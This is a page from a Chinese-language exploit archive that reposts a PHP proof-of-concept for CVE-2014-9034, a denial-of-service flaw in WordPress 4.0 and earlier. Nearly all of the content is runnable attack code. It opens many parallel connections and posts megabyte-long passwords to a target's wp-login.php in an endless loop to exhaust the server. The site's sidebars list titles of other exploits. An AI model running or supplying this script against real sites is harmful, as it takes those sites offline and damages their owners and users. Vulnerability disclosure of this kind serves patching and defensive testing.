首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress 4.0 Denial Of Service
来源:http://secureli.com 作者:Martinelli 发布时间:2014-12-01  
<?php

echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";

echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];

do {
 
$multi = curl_multi_init();
$channels = array();

for ($x = 0; $x < $argv[3]; $x++) {
	$ch = curl_init();

	$postData = array(
		'log' => $argv[2],
		'pwd' => str_repeat("A",1000000),
		'redirect_to' => $argv[1] . "/wp-admin/",
		'reauth' => 1,
		'testcookie' => '1',
		'wp-submit' => "Log%20In");

	$cookieFiles = "cookie.txt";

	curl_setopt_array($ch, array(
	    CURLOPT_HEADER => 1,
	    CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
	    CURLOPT_REFERER => $argv[1] . "/wp-admin/",
	    CURLOPT_COOKIEJAR => $cookieFiles,
	    CURLOPT_COOKIESESSION => true,
	    CURLOPT_URL => $argv[1] . '/wp-login.php',
	    CURLOPT_RETURNTRANSFER => true,
	    CURLOPT_POST => true,
	    CURLOPT_POSTFIELDS => $postData,
	    CURLOPT_FOLLOWLOCATION => true));
	 
    curl_multi_add_handle($multi, $ch);
 
    $channels[$x] = $ch;
}
 
$active = null;

do {
	$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
 
while ($active && $mrc == CURLM_OK) {
    do {

        $mrc = curl_multi_exec($multi, $active);
    } while ($mrc == CURLM_CALL_MULTI_PERFORM);
}

foreach ($channels as $channel) {
    curl_multi_remove_handle($multi, $channel);
}
 
curl_multi_close($multi);
echo ".";
} while (1==1);

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sniffit Root Shell
·Tiny Server 1.1.9 Arbitrary Fi
·Android SMS Resend Vulnerabili
·Microsoft Internet Explorer Wi
·Android Settings Pendingintent
·Tincd Post-Authentication Remo
·Slider Revolution/Showbiz Pro
·Mac OS X IOKit Keyboard Driver
·Device42 WAN Emulator 2.3 Ping
·IPUX CS7522/CS2330/CS2030 IP C
·Device42 WAN Emulator 2.3 Trac
·IPUX CL5452/CL5132 IP Camera S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved